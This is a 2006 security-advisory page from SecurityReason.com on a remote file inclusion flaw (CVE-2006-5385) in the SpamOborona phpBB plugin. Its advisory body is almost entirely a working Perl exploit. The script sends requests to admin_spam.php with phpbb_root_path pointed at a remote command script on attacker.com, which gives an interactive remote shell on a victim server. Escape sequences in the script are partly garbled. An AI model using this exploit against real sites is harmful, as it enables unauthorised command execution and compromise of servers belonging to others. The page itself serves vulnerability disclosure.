SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

SpamOborona PHPBB Plugin Remote File Include Vulnerability


Arrow  SecurityAlert : 1741
Arrow  CVE : CVE-2006-5385
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : Ashiyane Corporation
Arrow  Published : 19.10.2006

Arrow  Affected Software : SpamOborona PHPBB Plugin



Arrow  Advisory Content :  

#!/usr/bin/perl

########################################################################
#############################
#
#
# SpamOborona PHPBB Plugin
#
#
#
# Class: Remote File Include Vulnerability
#
#
#
# Patch: unavailable
#
#
#
# Date: 2006/10/12
#
#
#
# Remote: Yes
#
#
#
# Type: high
#
#
#
# Site: http://spamoborona.net/downloads.php
#
#
#
########################################################################
#############################

use IO::Socket;
use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With
Your Personal Script

print "n";
print
"#######################################################################
###n";
print "#
#n";
print "# SpamOborona PHPBB Plugin Remote File Include Vulnerability
#n";
print "# Bug found By : Ashiyane Corporation
#n";
print "# Email: nima salehi nima[at]ashiyane.ir
#n";
print "# Web Site : www.Ashiyane.ir
#n";
print "#
#n";
print
"#######################################################################
###n";

if (@ARGV < 2)
{
print "n Usage: Ashiyane.pl [host] [path] ";
print "n EX : Ashiyane.pl www.victim.com /path/ nn";
exit;
}

$host=$ARGV[0];
$path=$ARGV[1];
$vul="admin/admin_spam.php?phpbb_root_path="

print "Type Your Commands ( uname -a )n";
print "For Exiit Type ENDn";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") or die "Could not connect to host.nn";

print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1rn";
print $socket "Host: ".$host."rn";
print $socket "Accept: */*rn";
print $socket "Connection: closernn";

while ($raspuns = <$socket>)
{
print $raspuns;
}

print "<Shell> ";
$cmd = <STDIN>;
}





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libopie __readrec() off-by-one

Security Risk Medium- 2010-04-23

This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie.

Apache RSS Apache Alert

» Apache ActiveMQ 5.4.0
   source code disclosure
   vulnerability

» Apache ActiveMQ 5.3.0
   Persistent Cross-Site
   Scripting

» Apache CouchDB 0.10.1
   Timing Attack
   Vulnerability

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.